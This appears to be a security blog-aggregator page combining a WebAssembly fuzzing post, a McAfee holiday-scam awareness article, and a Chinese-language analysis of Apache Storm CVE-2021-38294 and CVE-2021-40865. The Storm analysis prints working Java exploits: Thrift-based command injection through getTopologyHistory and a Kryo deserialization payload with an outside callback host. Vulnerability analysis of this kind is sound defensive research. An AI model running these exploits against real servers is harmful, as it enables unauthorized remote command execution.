Reading view

There are new articles available, click to refresh the page.

Introduction to Dharma - Part 2 - Making Dharma More User-Friendly using WebAssembly as a Case-Study

30 November 2021 at 12:42

In the first part of our Dharma blogpost, we utilized Dharma to write grammar files to fuzz Adobe Acrobat JavaScript API's. Learning how to generate JavaScript code using Dharma opened a whole new area of research for us. In theory, we can target anything that uses JavaScript. According to the 2020 Stack Overflow Developer Survey, JavaScript sits comfortably in the #1 rank spot of being the most commonly used language in the world:

In this blogpost, we'll focus more on fuzzing WebAssembly API's in Chrome. To start with WebAssembly, we went and read the documentation provided by MDN.

We'll start by walking through the basics and getting familiarized with the idea of WebAssembly and how it works with browsers. WebAssembly helps to resolve many issues by using pre-compiled code that gets executed directly, running at near native speed.

After we had the basic idea of WebAssembly and its uses, we started building some simple applications (Hello World!, Calculator, ..), by doing that, we started to get more comfortable with WebAssembly's APIs, syntax and semantics.

Now we can start thinking about fuzzing WebAssembly.

If we break a WebAssembly Application down, we'll notice that its made of three components:

Pure JavaScript Code.
WebAssembly APIs.
WebAssembly Module.

Since we're trying to fuzz everything under the sun, we'll start with the first two components and then tackle the third one later.

JavaScript & WebAssembly API

This part contains a lot of JavaScript code. We need to pay attention to the syntactical part of the language or we'll end up getting logical and syntax errors that are just a headache to deal with. The best way to minimize errors, and easily generate syntactically (and hopefully logically) correct JavaScript code is using a grammar-based text generation tool, such as Domato or Dharma.

To start, we went to MDN and pulled all the WebAssembly APIs. Then we built a Dharma logic for each API. While doing so, we faced a lot of issues that could slow down or ruin our fuzzer. That said, we'll go over these issues later on in this blog.

To instantiate a WebAssembly module, we have to use WebAssembly.instantiate function, which takes a module (pre-compiled WebAssembly module) and optionally a buffer, here's how it looks as a JavaScript code:

The process is simple, we will'll have to test-try the code, understand how it works and then build Dharma logics for it. The same process applies to all the APIs. As a result, the function above can be translated to the following in Dharma:

The output should be similar to the following:

What we're trying to achieve is covering all possible arguments for that given function.

On a side note: The complexity and length of the Dharma file dramatically increased ever since we started working on this project. Thus, we decided to give code snippets rather than the whole code for brevity.

Coding Style

We had to follow a certain coding style during our journey in writing Dharma files for WebAssembly for different reasons.

First, in order to differentiate our logic from Dharma logic - Dharma provides a common.dg file which you can find in the following path: dharma/grammars/common.dg . This file contains helpful logic, such as digit which will give you a number between 0-9, and short_int which will give you a number between 0-65535. This file is useful but generic and sometimes we need something more specific to our logic. That said, we ended up creating our own logic:

We also decided to go with different naming conventions, so we can utilize the auto-complete feature of our text editor. Dharma uses snake_case for naming, we decided to go with Camel Case naming instead.

Also, for our coding style, we decided to use some sort of prefix and postfix to annotate the logic. Let's take variables for example, we start any variable with var followed by class or function name:

This is will make it easy to use later and would make it easier to understand in general.

We applied the same concept for parameters as well. We start with the function's name followed by Param as a naming convention:

Since we're mentioning parameters, let's go over an example of an idea we mentioned earlier. If a function has one or more optional parameters, we create a section for it to cover all the possibilities:

Therefor our coding style, we used comments to divide the file into sections so we can group and reach a certain function easily:

That said, you can easily find certain functions or parameters under its related section. This is a fairly good solution to make the file more manageable. At a certain point you have to make a file for each section, and group shared logic on an abstract shared file so you eliminate the duplication - maybe we'll talk about this on another blog (maybe not xD).

Testing and validation

After we finish the first version of our Dharma logic file we ran it, and noticed a lot of JavaScript logical errors. Small mistakes that we make normally do, like forgetting a bracket or a comma etc.. To solve these error we created a builder section were we build our logic there:

We had to go through each line one by one to eliminate all the possible logical errors. We also created a wrapper function that wraps the code with try-catch blocks:

By doing so, we made it much easier to isolate and test the possible output.

While we were working on the Dharma logic file we faced another issue. When you want your JavaScript to import something from the .wasm(eg. a table or a memory buffer) you have to provide it from the .wasm module. For that, we ended up making many modules that provide whatever we import from generated JS logic, and export whatever we import from .wasm modules. In brief, to do that we built a lot of .wasm modules, each one exports or imports what JavaScript needs to test an API. An example of this logic:

For that to work, you need the following .wasm file:

So if JavaScript is looking for the main function you should have a main function inside your .wasm module. Also, as we mentioned, there are many things to check like import/export table, import/export buffer, functions, and global variables. We'll have to combine many of them together, but some of them we couldn't like tables. You can only have one on your program either exported or imported. That said, we had to separate them into different modules and avoid some of them to reduce complexity.

After finishing our first version, we went to the chromium bug tracker which appears to be a great place to expand our logic to find more smart, complex tips and tricks. We used some of the snippets there as it is, and some of them with little modification. Also it's worth mentioning that, when you search you should apply the filter that is related to your area of interest. In our case we looked into all bugs that have Type of 'Bug-Security' and the component is Blink>JavaScript>WebAssembly, you can use this line on the search bar.

While we were reading these issues on the bug tracker, we found this bug that could be produced by our Dharma logic (if we were a bit faster xD)

WebAssembly Module

Now that we're done fuzzing the first two components, we can move on to the last component of WebAssembly, which is the module.

Everything that we did earlier was related to fuzzing the APIs and JavaScript's grammar, but we found two interesting functions used to compile and ensure the validity of that module, compile and validate functions. Both of these two function receive a .wasm module. The first function compiles WebAssembly binary code into a WebAssembly module, the second function returns whether the bytes from a .wasm module are valid (true) or not (false).

For both compile and validate, we made a .wasm corpus (by building or collecting), then we used Radamsa to mutate the binary of these files before we imported them from our two functions.

We improved the mutation by skipping the first part of the .wasm module which contains the header of the file (magic number and version), and start to mutate the actual wat instructions.

Stay tuned for the final part of our Dharma blog series, where we implement more advanced grammar files. Happy Hunting!!

Introduction to Dharma - Part 2 - Making Dharma More User-Friendly using WebAssembly as a Case-Study

‘Tis the Season for Scams

McAfee Blogs

Abhishek Karnik

29 November 2021 at 22:04

Co-authored by: Sriram P and Deepak Setty

‘Tis the season for scams. Well, honestly, it’s always scam season somewhere. In 2020, the Internet Crime and Complaint Center (IC3) reported losses in excess of $4.1 billion dollars in scams which was a 69% increase over 2019. There is no better time for a scammer celebration than Black Friday, Cyber Monday, and the lead-up to Christmas and New Year. It’s a predictable time of the year, which gives scammers ample time to plan and organize. The recipe isn’t complicated, at the base we have some holiday excitement, sprinkle in fake shopping deals and add some discounts, and ho ho ho we have social engineering scams.

In this blog, we want to increase awareness related to scams as we expect elevated activity during this holiday season. The techniques used to scam folks are very similar to those used to spread malware too, so always be alert and use caution when browsing and shopping online. We will provide some examples to help educate consumers on how to identify scams. The victims of such scams can be others around you like your kids or parents, so read up and spread the word with family and friends. Awareness, education, and being alert are key to keeping you at bay from fraudsters.

Relevant scams this season

Although there is a myriad of scams out there, we expect the most common scams and targets this season to be:

Non-delivery scams – Fake online stores will attempt to get you to purchase items that you will never end up receiving
Deals that get shoppers excited. Supply chain issues recently will give scammers more fodder. Scammers can place bait deals on popular items
Elderly parents/grandparents looking for cheap medical equipment, medical memberships, or looking to purchase and ship their grandchildren presents for the holidays.
Emotionally vulnerable people might fall prey to romance scams
Children looking for free, Fortnite Vbucks and other gaming credits may fall prey to scams and could even get infected with potentially unwanted programs
Charity scams will be rampant.

SMSishing, email-based Phishing, and push notifications will be the most common vectors initiating scams during this holiday season. Here are some common tactics in use today:

1. Unbelievable deals or discounts

This is a common theme around this time of the year. Deals, discounts, and gift cards can be costly to your bank account. Be wary of URLs being presented to you over email or SMS. Phishing emails, bulk mailing, texting, and typo-squatting are some of the ways that scammers target their prey.

2. Creating a sense of urgency

Scammers will create a sense of urgency by telling you that you have limited time to claim the deal or that there is low inventory for popular items in their store. It’s not difficult for scammers to identify sought-after electronics items or holiday gifts for sale and offer them for sale on their fake stores. Such scams are believable given the supply chain challenges and delivery shortages over the last few months.

3. Utilizing Scare tactics

Getting people worried about a life-changing event or disrupting travel plans can be concerning. So, if you get an unexpected call from someone claiming to be from the FBI, police, IRS, or even a travel company, stop and think. They may be using scare tactics to dupe you. Never divulge personal information and if in doubt, ask them a lot of directed questions and fact check them. As an example, check to see if they know your home address, account number, itinerary number, or bank balance depending on who they claim to be. Scammers typically don’t have specific details and when put on the spot, they’ll hang up.

4. Emotional tactics

Like scare tactics, scammers may prey on vulnerable people. Although there can be many variations of such scams, the more common ones are Romance Scams where you end up connecting to someone with a fake profile, and Fake Charity Scams where you receive a phone call or an email requesting a donation. Do not entertain such requests over the phone especially if you receive a phone call soliciting a donation. During the conversation, they will attempt to make you feel guilty or selfish for not contributing enough. Remember, there is no rush to donate. Go to a reputable website or a known organization and donate if you must after due diligence.

Tips to identify a scam

Successful scams are situationally accurate. You may be the smartest guy in the room, but when you eagerly waiting for that delivery and you see an email update claiming a delivery delay from UPS, you might fall for a scam. This is particularly true in the holiday season and therefore such themes are more prevalent. Here are some tips on how to identify scams early on.

Be suspicious of anything that is pushed to you from an unknown source – emails, SMS, advertisements, phone calls, surveys, social media. This is when you are being solicited to do something you might not have otherwise chosen to
1. Avoid going to unknown websites to begin with. You always have the option to r before you click on a link. You can always use some of the following trusted free resources to validate a domain or business
  1. https://trustedsource.org/ – to look up a URL
  2. https://www.virustotal.com/gui/home/url – to look up a URL
  3. https://www.bbb.org/ – to validate a business, charity, etc
  4. https://whois.domaintools.com/ – to look up site history. A new or recent domain is less trustworthy. Scammers register new domains based on the theme of their scams.
2. If you do end up navigating, look for the following to build trust in a link:
  1. Ensure it’s an “https” domain versus an “http”. A valid “https” certificate just means that your data is encrypted enroute to the website. Although this method isn’t indicative of a scam, some scams are hosted on compromised “http” sites. (example 1))
  2. Closely look at the domain name. They might be indicative of fakes. Scammers would typically register domains with very similar names to deceive you. For example, Amazon.com could be replaced by Arnazon.com or AMAZ0N.com. ‘vv’ could be replaced for ‘w’, ‘I’ for a 1, etc. Same goes for emails you receive – take a close look
  3. Another common way of reaching a fake website is due to “typosquatting” but this is typically human error, where a user may type an incorrect domain name and reach a fake site.
  4. Most legit sites will have a “Contact us”, “About Us”, “Conditions of Use”, “Privacy Notice”/”Terms”, “Help”, Social Media presence on Twitter, FB, Instagram, etc. Read up on the pages to learn about the website and even look for website reviews before you make a purchase. Fake websites do not invest a lot of time to populate these – this could be a giveaway.
3. Always confirm the sender of and email or text by validating the email address or phone number. For example, if an email claims to be from BankOfAmerica, you would expect their email domain in most cases to be from “@bankofamerica.com” and not from “@gmail.com”. Avoid clicking on links from emails or messages when you don’t know the sender.
4. If you end up linking to a page because of an email or message, never provide personal details. Any site asking for such information should raise red flags. Even if the site looks legit, Phishing scammers make exact replicas of web pages and try to get you to login. This allows them to steal your login credentials. (Example 4)
5. Don’t feel pressured to click on a link or provide details to solicitors in such cases especially. Any attempt to gather personal data is a big NO.
6. Never open attachments from unknown people. Emails with document attachments or PDF Attachments are very popular in spreading malware. The attachment names are typically very enticing to click on. Names like “invoice.pdf”, “receipt.doc”, “Covid-19 test results.doc”, etc. may invite some curiosity but could also lead to malware.
7. Ensure you review the hyperlink before you click them. It’s easy to fake the text and get you to an illegit page (Example 2)
8. Anyone who insists on payments using a pre-paid gift card or wire transfer, instead of your typical credit card is most likely attempting to scam you.

The end goal of a scammer is that they want to make money – so be alert with your cards and their activity.
1. Avoid using Debit Cards online. Use a prepaid or virtual Credit Card or even better utilize Apple Pay, Google Pay or PayPal for online payments. Payment card services today have advanced fraud monitoring systems
2. Check CC statements often to look for any unanticipated charges.
3. If you make a purchase, ensure you have a tracking number and monitor shipments
4. Disable international purchases if you know you won’t be traveling.
5. Never wire money directly to anyone you do not know.

What if you are a victim?

If you believe that you have been a victim of a scam, here are a few tips that might help.

First, get in touch with your Credit Card company and tell them to put a hold on your card. You can dispute any suspicious charges and request an issue of a chargeback
If you have been scammed through popular sites like ebay.com or amazon.com – contact them directly. If you wired money, contact the wire company directly
File a Police Report. If you gave your personal information away, you might want to go to
1. US – https://www.identitytheft.gov/
2. UK – www.cifas.org.uk
Notify and contribute – build awareness
1. US
  1. https://reportfraud.ftc.gov/#/?pid=A – (877) 382-4357
  2. https://www.bbb.org/
  3. https://www.ic3.gov/
  4. https://www.fbi.gov/scams-and-safety
2. UK
  1. https://www.actionfraud.police.uk/ – 0300 123 2040
  2. https://www.gov.uk/find-local-trading-standards-office
  3. https://www.citizensadvice.org.uk/

Example scams:

Example 1: Fake SMS messages

It’s become more common recently to receive text messages for scammers. The following few text messages demonstrate SMSishing attempts.

The first is an attempt to gather Bank Of America details. For the scammer, it’s a shot in the dark. Given, the target is a US number, he attempts to use the phone number that he is sending the text to, as a bank account number and provides a link to a bit.ly page (a URL shortening service) to link to a fake page that poses as a Bank of America login. A successful SMSish would be if the victim entered their details.

2. The following are fake texts that attempt to entice you click the link. The bait is the Gift card. One can tell that they are a similar theme since they originate from fake phone numbers, which are very similar but not exact. The domain names of the two URLs are totally random (probably compromised URLs). You can tell that back in October, the full URL based SMShing attempts were not very effective which is why in Nov, they probably used keywords like “COSTCO” and “ebay” within the URL and inline to their SMS context, to make it more likely for people to click.

Also note that some of the URLs only have an “http” versus a “https”, something we had noted earlier in the blog.

Example 2: Fake email link

One cannot trust an email by the text. You should review the link to ensure it takes you to where it claims to. The following is an example email where the link is not what it claims to be.

Example 3: Fake Store Scam hosted on Shopify

Shopify is a Canadian multinational e-commerce company. It offers online retailers a suite of services, including payments, marketing, shipping, and customer engagement tools.

So, where there is money to be made, individuals are looking to take advantage. Shopify scam targets both consumers and business owners. Scammer abuse the power of e-commerce to earn money by implementing fake stores. They observe the product or category, create an attractive logo or image and promote extensively on social media.

Fake Bike Online Purchase store – Mountain-ranger-com

Site: hxxps://mountain-ranger-com.myshopify.com/collections/all

SSL info:

This site is hosted on Shopify, so it has a valid SSL cert which is the first thing we check on where we transact.

Whois Record ( last updated on 2021-11-19 )

Domain Name: myshopify.com
Registry Domain ID: 362759365_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2021-03-02T23:39:12+0000
Creation Date: 2006-03-03T03:01:37+0000
Registrar Registration Expiration Date: 2024-03-02T08:00:00+0000
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +1.2083895770
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registrant Organization: Shopify Inc.
Registrant State/Province: ON
Registrant Country: CA
Registrant Email: Select Request Email Format

The registrar info for the site is valid too, as it is hosted on Shopify. If you look closer, however, one will notice red flags:

Compare these prices listed on other known sites like amazon: Price listed on the fake site versus price listed on Amazon. This is an “unbelievable” deal.

Examples of similar sites showing incredible discounts.

2. The “About Us” doesn’t make much sense when you see the products that are being offered:

A quick google on the text shows that multiple sites are using the same exact text (most of them probably fake)

3. There are no customer reviews about the products listed.

4. It has a public email server (gmail) in its return policy

5. Looking up the list address in google maps wouldn’t show up anything and looking up the number in apps like true caller shows it’s fake.

Example 4: Social Engineering to Steal Credentials

The goal of this scam is to steal credentials however it could as well be used as a malware delivery mechanism. The screenshot is that of a fake business proposal hosted on OneDrive Cloud for phishing purposes.

The actor aims to mislead the user into clicking on the above reference link. When the user clicks on the link, it redirects to a different website that displays the below fake OneDrive screenshot.

hxxps://aidaccounts[.]com/11/verified/22/

If a user enters their OneDrive details, the actors receive them at their backend. This means that this victim has lost their login credentials to the phishing actors. Look at the address bar and trust your instincts. This is in no way related to Microsoft OneDrive. There are other such examples where they do some additional plumbing of the URL to include keywords that make it more believable – as they did in the SMSishing example above.

Example 5: Fake Push Notification for surveys

The goal here is to get the user to accept push notifications. Doing so makes the customer susceptible to other possible scams. In this example, the scammers attempt to get users to fill out surveys. Legit companies online pay users for surveys. A referral code is used to pay the survey taker. The scammer in this case attempts to get others to fill the survey on their behalf and therefore makes money when such surveys use the scammer’s referral code. Push notifications are used to get the victims to fill out surveys. Previous blogs from McAfee demonstrate similar scams and how to prevent such notifications

The initial vector comes to the victim via a spam email with a PDF Spam attachment. In this scenario, Gmail was used as the sender.

Upon opening the PDF, a fake online PUBG (Players Unknown Battleground) credits generator gets opened. In PUBG, Gamers need credits to participate in various online games and so this scam baits them offering free credits.

Once the user clicks on the bait URL, it opens a google feed proxy URL.

Malicious websites are destined to be block-listed and therefore have short shelf lives. Google’s feed proxy redirects them in adapting to new URLs and therefore utilizes a fast-flux mechanism as a technique to keep the campaign alive. Usage of feed proxy are not new and we have highlighted its use in the past by the hancitor botnet.

Clicking on the top highlighted URL, it navigates to a webpage that poses as a PUBG Arcane online credit generator.

To make the online generator look real, the website has added fake recent activities highlighting coins users have earned via this generator. Even the add comments section is fake.

Clicking on continue will bring up a fake progress bar. Now the site shows the coins and cash are ready, however, an automated human verification has failed, and a survey has to be taken up for getting the reward.

A clickable link for this verification is also loaded. Once clicked, a small dialog with 3 options are presented.

Clicking on “want to become a millionaire” loaded a survey page and prompts you to take it up. It will also prompt you to allow push notifications from this website.

Once you click on “Allow”, notifications to take up a survey or fake personalized offer notifications start popping up. Be it on your desktop or on your mobile, these notifications pop-ups to take up more surveys.

Clicking on the other links too from “Human Verification”, you will realize that you have finally ended up not gaining anything for your PUBG Arcane gaming, but ended up taking surveys.

Here is another example of a PDF theme we have seen as a lure on the Lenovo tablet offer.

Clicking on this link takes the user to a page that claims it has been protected by a technique to block bots. Persuading you to click on the allow button for enabling popups.

Once you click on the enable button, it then redirects the browser to take up a random survey. In our case, the survey was on household income.

Another such theme that we observed was around the latest Netflix series – Squid games. Although Series 1 has currently been released, the fake email prompts early access to Season 2.

Scammers spend a lot of time and effort tweaking and tuning their schemes to make it fit just right for you. Avoiding a scam is not full proof but being vigilant is key. Don’t get overly keen when you get offers thrown at you this season. Take a step back, relax and think it through, not only should you do your own research, but you should also trust your instincts. Spending a little extra on products or making donations to a reputable and known organization might be worth the peace of mind during the holidays. Help educate your family and contribute by reporting scams.

Happy Holidays!

The post ‘Tis the Season for Scams appeared first on McAfee Blog.

Apache Storm 漏洞分析

Noah Lab

tiantian

29 November 2021 at 16:06

Author: 0x28

0x00 前言

前段时间Apache Storm更了两个CVE，简短分析如下，本篇文章将对该两篇文章做补充。
GHSL-2021-086: Unsafe Deserialization in Apache Storm supervisor - CVE-2021-40865
GHSL-2021-085: Command injection in Apache Storm Nimbus - CVE-2021-38294

0x01 漏洞分析

CVE-2021-38294 影响版本为：1.x~1.2.3,2.0.0~2.2.0
CVE-2021-40865 影响版本为：1.x~1.2.3,2.1.0,2.2.0

CVE-2021-38294

1、补丁相关细节

针对CVE-2021-38294命令注入漏洞，官方推出了补丁代码https://github.com/apache/storm/compare/v2.2.0...v2.2.1#diff-30ba43eb15432ba1704c2ed522d03d588a78560fb1830b831683d066c5d11425
将原本代码中的bash -c 和user拼接命令行执行命令的方式去掉，改为直接传入到数组中，即使user为拼接的命令也不会执行成功，带入的user变量中会直接成为id命令的参数。说明在ShellUtils类中调用，传入的user参数为可控

因此若传入的user参数为";whomai;"，则其中getGroupsForUserCommand拼接完得到的String数组为

new String[]{"bash","-c","id -gn ; whoami;&& id -Gn; whoami;"}

而execCommand方法为可执行命令的方法，其底层的实现是调用ProcessBuilder实现执行系统命令，因此传入该String数组后，调用bash执行shell命令。其中shell命令用户可控，从而导致可执行恶意命令。

2、execCommand命令执行细节

接着上一小节往下捋一捋命令执行函数的细节，ShellCommandRunnerImpl.execCommand()的实现如下

execute()往后的调用链为execute()->ShellUtils.run()->ShellUtils.runCommand()

最终传入shell命令，调用ProcessBuilder执行命令。

3、调用栈执行流程细节

POC中作者给出了调试时的请求栈。

getGroupsForUserCommand:124, ShellUtils (org.apache.storm.utils)getUnixGroups:110, ShellBasedGroupsMapping (org.apache.storm.security.auth)getGroups:77, ShellBasedGroupsMapping (org.apache.storm.security.auth)userGroups:2832, Nimbus (org.apache.storm.daemon.nimbus)isUserPartOf:2845, Nimbus (org.apache.storm.daemon.nimbus)getTopologyHistory:4607, Nimbus (org.apache.storm.daemon.nimbus)getResult:4701, Nimbus$Processor$getTopologyHistory (org.apache.storm.generated)getResult:4680, Nimbus$Processor$getTopologyHistory (org.apache.storm.generated)process:38, ProcessFunction (org.apache.storm.thrift)process:38, TBaseProcessor (org.apache.storm.thrift)process:172, SimpleTransportPlugin$SimpleWrapProcessor (org.apache.storm.security.auth)invoke:524, AbstractNonblockingServer$FrameBuffer (org.apache.storm.thrift.server)run:18, Invocation (org.apache.storm.thrift.server)runWorker:-1, ThreadPoolExecutor (java.util.concurrent)run:-1, ThreadPoolExecutor$Worker (java.util.concurrent)run:-1, Thread (java.lang)

根据以上在调用栈分析时，从最终的命令执行的漏洞代码所在处getGroupsForUserCommand仅仅只能跟踪到nimbus.getTopologyHistory()方法，似乎有点难以判断道作者在做该漏洞挖掘时如何确定该接口对应的是哪个服务和端口。也许作者可能是翻阅了大量的文档资料和测试用例从而确定了该接口，是如何从某个端口进行远程调用。

全文搜索6627端口，找到了6627在某个类中，被设置为默认值。以及结合在细读了Nimbus.java的代码后，关于以上疑惑我的大致分析如下。

Nimbus服务的启动时的步骤我人为地将其分为两个步骤，第一个是读取相应的配置得到端口，第二个是根据配置文件开启对应的端口和绑定相应的Service。

首先是启动过程，前期启动过程在/bin/storm和storm.py中加载Nimbus类。在Nimbus类中，main()->launch()->launchServer()后，launchServer中先实例化一个Nimbus对象，在New Nimbus时加载Nimbus构造方法，在这个构造方法执行过程中，加载端口配置。接着实例化一个ThriftServer将其与nimbus对象绑定，然后初始化后，调用serve()方法接收传过来的数据。

Nimbus函数中通过this调用多个重载构造方法

在最后一个构造方法中发现其调用fromConf加载配置，并赋值给nimbusHostPortInfo

fromConf方法具体实现细节如下，这里直接设置port默认值为6627端口

然后回到主流程线上，server.serve()开始接收请求

至此已经差不多理清了6627端口对应的服务的情况，也就是说，因为6627端口绑定了Nimbus对象，所以可以通过对6627端口进行远程调用getTopologyHistory方法。

4、关于如何构造POC

根据以上漏洞分析不难得出只需要连接6627端口，并发送相应字符串即可。已经确定了6627端口服务存在的漏洞，可以通过源代码中的的测试用例进行快速测试，避免了需要大量翻阅文档构造poc的过程。官方poc如下

import org.apache.storm.utils.NimbusClient;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

public class ThriftClient {
    public static void main(String[] args) throws Exception {
        HashMap config = new HashMap();
        List<String> seeds = new ArrayList<String>();
        seeds.add("localhost");
        config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
        config.put("storm.thrift.socket.timeout.ms", 60000);
        config.put("nimbus.seeds", seeds);
        config.put("storm.nimbus.retry.times", 5);
        config.put("storm.nimbus.retry.interval.millis", 2000);
        config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
        config.put("nimbus.thrift.port", 6627);
        config.put("nimbus.thrift.max_buffer_size", 1048576);
        config.put("nimbus.thrift.threads", 64);
        NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);

        // send attack
        nimbusClient.getClient().getTopologyHistory("foo;touch /tmp/pwned;id ");
    }
}

在测试类org/apache/storm/nimbus/NimbusHeartbeatsPressureTest.java中，有以下代码针对6627端口的测试

可以看到实例化过程需要传入配置参数，远程地址和端口。配置参数如下,构造一个config即可。

并且通过getClient().xxx()对相应的方法进行调用，如下图中调用sendSupervisorWorkerHeartbeats

且与getTopologyHistory一样，该方法同样为Nimbus类的成员方法，因此可以使用同样的手法对getTopologyHistory进行远程调用

CVE-2021-40865

1、补丁相关细节

针对CVE-2021-40865，官方推出的补丁代码，对传过来的数据在反序列化之前若默认配置不开启验证则增加验证（https://github.com/apache/storm/compare/v2.2.0...v2.2.1#diff-463899a7e386ae4ae789fb82786aff023885cd289c96af34f4d02df490f92aa2），即默认开启验证。

通过查阅资料可知ChannelActive方法为连接时触发验证

可以看到在旧版本的代码上的channelActive方法没有做登录时的登录验证。且从补丁信息上也可以看出来这是一个反序列化漏洞的补丁。该反序列化功能存在于StormClientPipelineFactory.java中，由于没做登录验证，导致可以利用该反序列化漏洞调用gadget执行系统命令。

2、反序列化漏洞细节

在StormClientPipelineFactory.java中数据流进来到最终进行处理需要经过解码器，而解码器则调用的是MessageCoder和KryoValuesDeserializer进行处理，KryoValuesDeserializer需要先进行初步生成反序列化器，最后通过MessageDecoder进行解码

最终在数据流解码时触发进入MessageDecoder.decode()，在decode逻辑中，作者也很精妙地构造了fake数据完美走到反序列化最终流程点。首先是读取两个字节的short型数据到code变量中

判断该code是否为-600，若为-600则取出四个字节作为后续字节的长度，接着去除后续的字节数据传入到BackPressureStatus.read()中

并在read方法中对传入的bytes进行反序列化

3、调用栈执行流程细节

尝试跟着代码一直往上回溯一下，找到开启该服务的端口

Server.java - new Server(topoConf, port, cb, newConnectionResponse);
WorkerState.java - this.mqContext.bind(topologyId, port, cb, newConnectionResponse); 
Worker.java - loadWorker(IStateStorage stateStorage, IStormClusterState stormClusterState,Map<String, String> initCreds, Credentials initialCredentials)
LocalContainerLauncher.java - launchContainer(int port, LocalAssignment assignment, LocalState state)
Slot.java - run()
ReadClusterState.java - ReadClusterState()
Supervisor.java - launch()
Supervisor.java - launchDaemon()

而在Supervisor.java中先实例化Supervisor，在实例化的同时加载配置文件（配置文件storm.yaml配置6700端口），然后调用launchDaemon进行服务加载

读取配置文件细节为会先调用ConfigUtils.readStormConfig()读取对应的配置文件

ConfigUtils.readStormConfig() -> ConfigUtils.readStormConfigImpl() -> Utils.readFromConfig()

可以看到调用findAndReadConfigFile读取storm.yaml

读取完配置文件后进入launchDaemon，调用launch方法

在launch中实例化ReadClusterState

在ReadClusterState的构造方法中会依次调用slot.start()，进入Slot的run方法。最终调用LocalContainerLauncher.launchContainer()，并同时传入端口等配置信息，最终调用new Server(topoConf, port, cb, newConnectionResponse)，监听对应的端口和绑定Handler。

4、关于POC构造

import org.apache.commons.io.IOUtils;
import org.apache.storm.serialization.KryoValuesSerializer;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.URLDNS;

import java.io.*;
import java.math.BigInteger;
import java.net.*;
import java.util.HashMap;

public class NettyExploit {

    /**
     * Encoded as -600 ... short(2) len ... int(4) payload ... byte[]     *
     */
    public static byte[] buffer(KryoValuesSerializer ser, Object obj) throws IOException {
        byte[] payload = ser.serializeObject(obj);
        BigInteger codeInt = BigInteger.valueOf(-600);
        byte[] code = codeInt.toByteArray();
        BigInteger lengthInt = BigInteger.valueOf(payload.length);
        byte[] length = lengthInt.toByteArray();

        ByteArrayOutputStream outputStream = new ByteArrayOutputStream( );
        outputStream.write(code);
        outputStream.write(new byte[] {0, 0});
        outputStream.write(length);
        outputStream.write(payload);
        return outputStream.toByteArray( );
    }

    public static KryoValuesSerializer getSerializer() throws MalformedURLException {
        HashMap<String, Object> conf = new HashMap<>();
        conf.put("topology.kryo.factory", "org.apache.storm.serialization.DefaultKryoFactory");
        conf.put("topology.tuple.serializer", "org.apache.storm.serialization.types.ListDelegateSerializer");
        conf.put("topology.skip.missing.kryo.registrations", false);
        conf.put("topology.fall.back.on.java.serialization", true);
        return new KryoValuesSerializer(conf);
    }

    public static void main(String[] args) {
        try {
            // Payload construction
            String command = "http://k6r17p7xvz8a7wj638bqj6dydpji77.burpcollaborator.net";
            ObjectPayload gadget = URLDNS.class.newInstance();
            Object payload = gadget.getObject(command);

            // Kryo serialization
            byte[] bytes = buffer(getSerializer(), payload);

            // Send bytes
            Socket socket = new Socket("127.0.0.1", 6700);
            OutputStream outputStream = socket.getOutputStream();
            outputStream.write(bytes);
            outputStream.flush();
            outputStream.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

其实这个反序列化POC构造跟其他最不同的点在于需要构造一些前置数据，让后面被反序列化的字节流走到反序列化方法中，因此需要先构造一个两个字节的-600数值，再构造一个四个字节的数值为序列化数据的长度数值，再加上自带序列化器进行构造的序列化数据，发送到服务端即可。

0x02 复现&回显Exp

CVE-2021-38294

复现如下

调试了一下EXP，由于是直接的命令执行，因此直接采用将执行结果写入一个不存在的js中（命令执行自动生成），访问web端js即可。

import com.github.kevinsawicki.http.HttpRequest;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.thrift.TException;
import org.apache.storm.thrift.transport.TTransportException;
import org.apache.storm.utils.NimbusClient;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

public class CVE_2021_38294_ECHO {
    public static void main(String[] args) throws Exception, AuthorizationException {
        String command = "ifconfig";
        HashMap config = new HashMap();
        List<String> seeds = new ArrayList<String>();
        seeds.add("localhost");
        config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
        config.put("storm.thrift.socket.timeout.ms", 60000);
        config.put("nimbus.seeds", seeds);
        config.put("storm.nimbus.retry.times", 5);
        config.put("storm.nimbus.retry.interval.millis", 2000);
        config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
        config.put("nimbus.thrift.port", 6627);
        config.put("nimbus.thrift.max_buffer_size", 1048576);
        config.put("nimbus.thrift.threads", 64);
        NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);
        nimbusClient.getClient().getTopologyHistory("foo;" + command + "> ../public/js/log.min.js; id");
        String response = HttpRequest.get("http://127.0.0.1:8082/js/log.min.js").body();
        System.out.println(response);
    }

}

CVE-2021-40865

复现如下

该利用暂时没有可用的gadget配合进行RCE。

0x03 写在最后

由于本次分析时调试环境一直起不来，因此直接静态代码分析，可能会有漏掉或者错误的地方，还请师傅们指出和见谅。

0x04 参考

https://www.w3cschool.cn/apache_storm/apache_storm_installation.html

https://securitylab.github.com/advisories/GHSL-2021-086-apache-storm/

https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/

https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html

https://github.com/frohoff/ysoserial

https://www.w3cschool.cn/apache_storm/apache_storm_installation.html

https://m.imooc.com/wiki/nettylesson-netty02

https://xz.aliyun.com/t/7348

The InfoSecurity Challenge 2021 Full Writeup: Battle Royale for $30k

spaceraccoon.dev

